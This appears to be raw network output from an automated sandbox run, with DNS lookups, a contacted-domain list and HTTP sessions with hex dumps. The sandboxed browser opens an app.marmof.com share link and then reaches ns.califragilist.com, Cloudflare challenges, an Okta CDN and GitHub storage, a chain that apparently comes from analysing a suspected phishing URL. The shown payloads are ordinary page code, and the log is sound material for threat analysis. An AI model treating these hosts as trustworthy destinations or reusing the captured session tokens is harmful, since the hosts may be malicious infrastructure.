                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET1.1.1.1192.168.2.180x6c55No error (0)d2qumtq956sbet.cloudfront.net18.66.147.126A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET1.1.1.1192.168.2.180x6c55No error (0)d2qumtq956sbet.cloudfront.net18.66.147.74A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.578794956 CET1.1.1.1192.168.2.180x7c6dNo error (0)ui-avatars.com104.26.8.185A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.578794956 CET1.1.1.1192.168.2.180x7c6dNo error (0)ui-avatars.com104.26.9.185A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.578794956 CET1.1.1.1192.168.2.180x7c6dNo error (0)ui-avatars.com172.67.75.120A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.579144955 CET1.1.1.1192.168.2.180x7c1fNo error (0)ui-avatars.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET1.1.1.1192.168.2.180xc159No error (0)r.wdfl.cod2qumtq956sbet.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET1.1.1.1192.168.2.180xc159No error (0)d2qumtq956sbet.cloudfront.net18.66.147.68A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET1.1.1.1192.168.2.180xc159No error (0)d2qumtq956sbet.cloudfront.net18.66.147.74A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET1.1.1.1192.168.2.180xc159No error (0)d2qumtq956sbet.cloudfront.net18.66.147.126A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET1.1.1.1192.168.2.180xc159No error (0)d2qumtq956sbet.cloudfront.net18.66.147.86A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.581581116 CET1.1.1.1192.168.2.180xd3aeNo error (0)r.wdfl.cod2qumtq956sbet.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.961045980 CET1.1.1.1192.168.2.180x870bNo error (0)plausible.io169.150.236.104A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.200484037 CET1.1.1.1192.168.2.180x4474No error (0)marmof.com159.69.48.31A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.364249945 CET1.1.1.1192.168.2.180x3ecaNo error (0)app.marmof.com159.69.48.31A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.407545090 CET1.1.1.1192.168.2.180x23adNo error (0)ui-avatars.com104.26.8.185A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.407545090 CET1.1.1.1192.168.2.180x23adNo error (0)ui-avatars.com172.67.75.120A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.407545090 CET1.1.1.1192.168.2.180x23adNo error (0)ui-avatars.com104.26.9.185A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.409379005 CET1.1.1.1192.168.2.180x7e42No error (0)ui-avatars.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.775310040 CET1.1.1.1192.168.2.180xda1No error (0)plausible.io169.150.221.147A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:25.465851068 CET1.1.1.1192.168.2.180xf81cNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:25.465867043 CET1.1.1.1192.168.2.180x53No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:31.611038923 CET1.1.1.1192.168.2.180xa25bNo error (0)ns.califragilist.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:31.631236076 CET1.1.1.1192.168.2.180x1134No error (0)ns.califragilist.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:31.631236076 CET1.1.1.1192.168.2.180x1134No error (0)ns.califragilist.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.564779997 CET1.1.1.1192.168.2.180xc4dbNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.564779997 CET1.1.1.1192.168.2.180xc4dbNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.564779997 CET1.1.1.1192.168.2.180xc4dbNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.564779997 CET1.1.1.1192.168.2.180xc4dbNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566498041 CET1.1.1.1192.168.2.180x3059No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566514969 CET1.1.1.1192.168.2.180x43ccNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566514969 CET1.1.1.1192.168.2.180x43ccNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566530943 CET1.1.1.1192.168.2.180x6922No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566530943 CET1.1.1.1192.168.2.180x6922No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.566853046 CET1.1.1.1192.168.2.180x44beNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.565190077 CET1.1.1.1192.168.2.180x42a6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.565190077 CET1.1.1.1192.168.2.180x42a6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.565190077 CET1.1.1.1192.168.2.180x42a6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.565190077 CET1.1.1.1192.168.2.180x42a6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.588970900 CET1.1.1.1192.168.2.180x58d6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.588970900 CET1.1.1.1192.168.2.180x58d6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.589087963 CET1.1.1.1192.168.2.180x9d53No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.376774073 CET1.1.1.1192.168.2.180x2023No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.376774073 CET1.1.1.1192.168.2.180x2023No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.378806114 CET1.1.1.1192.168.2.180xc56No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.393449068 CET1.1.1.1192.168.2.180x42c8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.393449068 CET1.1.1.1192.168.2.180x42c8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.393709898 CET1.1.1.1192.168.2.180x91a0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:37.955204010 CET1.1.1.1192.168.2.180x9489No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:52.500078917 CET1.1.1.1192.168.2.180x5b12No error (0)ns.califragilist.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:52.500078917 CET1.1.1.1192.168.2.180x5b12No error (0)ns.califragilist.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:52.501843929 CET1.1.1.1192.168.2.180xa40fNo error (0)ns.califragilist.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.980462074 CET1.1.1.1192.168.2.180x649dNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET1.1.1.1192.168.2.180xd523No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET1.1.1.1192.168.2.180xd523No error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET1.1.1.1192.168.2.180xd523No error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET1.1.1.1192.168.2.180xd523No error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET1.1.1.1192.168.2.180xd523No error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:58.012017012 CET1.1.1.1192.168.2.180x99c9No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET1.1.1.1192.168.2.180x780fNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET1.1.1.1192.168.2.180x780fNo error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET1.1.1.1192.168.2.180x780fNo error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET1.1.1.1192.168.2.180x780fNo error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET1.1.1.1192.168.2.180x780fNo error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.180268049 CET1.1.1.1192.168.2.180xe5baNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.242856979 CET1.1.1.1192.168.2.180x25a2No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.242856979 CET1.1.1.1192.168.2.180x25a2No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.242856979 CET1.1.1.1192.168.2.180x25a2No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.242856979 CET1.1.1.1192.168.2.180x25a2No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.195177078 CET1.1.1.1192.168.2.180xeff4No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.195177078 CET1.1.1.1192.168.2.180xeff4No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.195177078 CET1.1.1.1192.168.2.180xeff4No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.195177078 CET1.1.1.1192.168.2.180xeff4No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:04.402343988 CET1.1.1.1192.168.2.180x18baNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:04.402343988 CET1.1.1.1192.168.2.180x18baNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:37.964847088 CET1.1.1.1192.168.2.180x1b40No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                              • app.marmof.com
                                                                                                                                              • https:
                                                                                                                                                • r.wdfl.co
                                                                                                                                                • ui-avatars.com
                                                                                                                                                • plausible.io
                                                                                                                                                • marmof.com
                                                                                                                                                • code.jquery.com
                                                                                                                                                • cdnjs.cloudflare.com
                                                                                                                                                • challenges.cloudflare.com
                                                                                                                                                • ns.califragilist.com
                                                                                                                                                • github.com
                                                                                                                                                • ok4static.oktacdn.com
                                                                                                                                                • objects.githubusercontent.com
                                                                                                                                              • a.nel.cloudflare.com
                                                                                                                                              • otelrules.azureedge.net
                                                                                                                                              • login.live.com
                                                                                                                                              • www.bing.com
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.18497054.245.163.56443
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:54:46 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1l7r34xy2ECzV4h&MD=O24uwPML HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Accept: */*
                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                              2024-11-06 15:54:46 UTC560INHTTP/1.1 200 OK
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Expires: -1
                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                              MS-CorrelationId: 8e722e34-e7a5-422f-b136-86ee46f02e89
                                                                                                                                              MS-RequestId: 751ff152-b560-4561-87bc-8966f7883a67
                                                                                                                                              MS-CV: ZYaFtEzpY0i9SZdz.0
                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Date: Wed, 06 Nov 2024 15:54:46 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 24490
                                                                                                                                              2024-11-06 15:54:46 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                              2024-11-06 15:54:46 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.1849736159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:21 UTC689OUTGET /share/01jc0wzptpy7bepvzk4ner7dc5 HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:22 UTC1229INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:22 GMT
                                                                                                                                              Vary: X-Inertia
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; expires=Sat, 09 Nov 2024 15:55:22 GMT; Max-Age=259200; path=/; samesite=lax
                                                                                                                                              Set-Cookie: marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D; expires=Sat, 09 Nov 2024 15:55:22 GMT; Max-Age=259200; path=/; httponly; samesite=lax
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              2024-11-06 15:55:22 UTC15155INData Raw: 31 62 65 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69
                                                                                                                                              Data Ascii: 1be8<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... Favicons --> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"> <li
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 0d 0a 32 30 30 30 0d 0a 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 2b 69 2b 64 6c 3b 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69
                                                                                                                                              Data Ascii: w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.2000googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.i
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 74 65 72 73 22 3a 5b 22 64 6f 63 75 6d 65 6e 74 22 5d 2c 22 62 69 6e 64 69 6e 67 73 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 22 3a 22 69 64 22 7d 7d 2c 22 64 6f 63 75 6d 65 6e 74 73 2e 64 65 73 74 72 6f 79 22 3a 7b 22 75 72 69 22 3a 22 64 6f 63 75 6d 65 6e 74 73 22 2c 22 6d 65 74 68 6f 64 73 22 3a 5b 22 44 45 4c 45 54 45 22 5d 2c 22 64 6f 6d 61 69 6e 22 3a 22 61 70 70 2e 6d 61 72 6d 6f 66 2e 63 6f 6d 22 7d 2c 22 64 6f 63 75 6d 65 6e 74 73 2e 69 6e 64 65 78 22 3a 7b 22 75 72 69 22 3a 22 64 6f 63 75 6d 65 6e 74 73 22 2c 22 6d 65 74 68 6f 64 73 22 3a 5b 22 47 45 54 22 2c 22 48 45 41 44 22 5d 2c 22 64 6f 6d 61 69 6e 22 3a 22 61 70 70 0d 0a 31 30 30 30 0d 0a 2e 6d 61 72 6d 6f 66 2e 63 6f 6d 22 7d 2c 22 64 6f 63 75 6d 65 6e 74 73 2e 63 72 65 61 74 65 22 3a 7b 22 75
                                                                                                                                              Data Ascii: ters":["document"],"bindings":{"document":"id"}},"documents.destroy":{"uri":"documents","methods":["DELETE"],"domain":"app.marmof.com"},"documents.index":{"uri":"documents","methods":["GET","HEAD"],"domain":"app1000.marmof.com"},"documents.create":{"u
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 61 79 73 7c 7c 22 22 21 3d 3d 61 3f 21 69 73 4e 61 4e 28 63 29 26 26 66 21 3d 3d 61 26 26 53 74 72 69 6e 67 28 63 29 3d 3d 3d 61 26 26 63 3e 3d 30 26 26 65 2e 70 61 72 73 65 41 72 72 61 79 73 26 26 63 3c 3d 65 2e 61 72 72 61 79 4c 69 6d 69 74 3f 28 75 3d 5b 5d 29 5b 63 5d 3d 6f 3a 22 5f 5f 70 72 6f 74 6f 5f 5f 22 21 3d 3d 61 26 26 28 75 5b 61 5d 3d 6f 29 3a 75 3d 7b 30 3a 6f 7d 7d 6f 3d 75 7d 72 65 74 75 72 6e 20 6f 7d 28 61 2c 72 2c 65 2c 6e 29 7d 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 78 3b 69 66 28 6e 75 6c 6c 21 3d 74 2e 64 65 63 6f 64 65 72 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 2e 64 65 63 6f 64 65 72 29 74 68 72 6f
                                                                                                                                              Data Ascii: ays||""!==a?!isNaN(c)&&f!==a&&String(c)===a&&c>=0&&e.parseArrays&&c<=e.arrayLimit?(u=[])[c]=o:"__proto__"!==a&&(u[a]=o):u={0:o}}o=u}return o}(a,r,e,n)}},$=function(t,r){var e=function(t){if(!t)return x;if(null!=t.decoder&&"function"!=typeof t.decoder)thro
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 2e 31 35 38 33 20 31 30 39 2e 32 34 32 20 31 36 2e 37 38 20 31 30 31 2e 34 20 31 36 2e 37 38 48 37 34 2e 34 36 56 33 2e 35 36 30 30 31 43 37 34 2e 34 36 20 32 2e 32 30 31 39 34 20 37 33 2e 33 35 38 31 20 31 2e 31 30 30 30 31 20 37 32 20 31 2e 31 30 30 30 31 5a 4d 31 30 31 2e 34 20 32 31 2e 37 43 31 30 36 2e 35 32 39 20 32 31 2e 37 20 31 31 30 2e 37 20 32 35 2e 38 37 34 33 20 31 31 30 2e 37 20 33 31 56 35 38 2e 34 34 43 31 31 30 2e 37 20 36 33 2e 35 36 35 38 20 31 30 36 2e 35 32 39 20 36 37 2e 37 34 20 31 30 31 2e 34 20 36 37 2e 37 34 48 34 32 2e 36 43 33 37 2e 34 37 30 36 20 36 37 2e 37 34 20 33 33 2e 33 20 36 33 2e 35 36 35 38 20 33 33 2e 33 20 35 38 2e 34 34 56 33 31 43 33 33 2e 33 20 32 35 2e 38 37 34 33 20 33 37 2e 34 37 30 36 20 32 31 2e 37 20 34 32
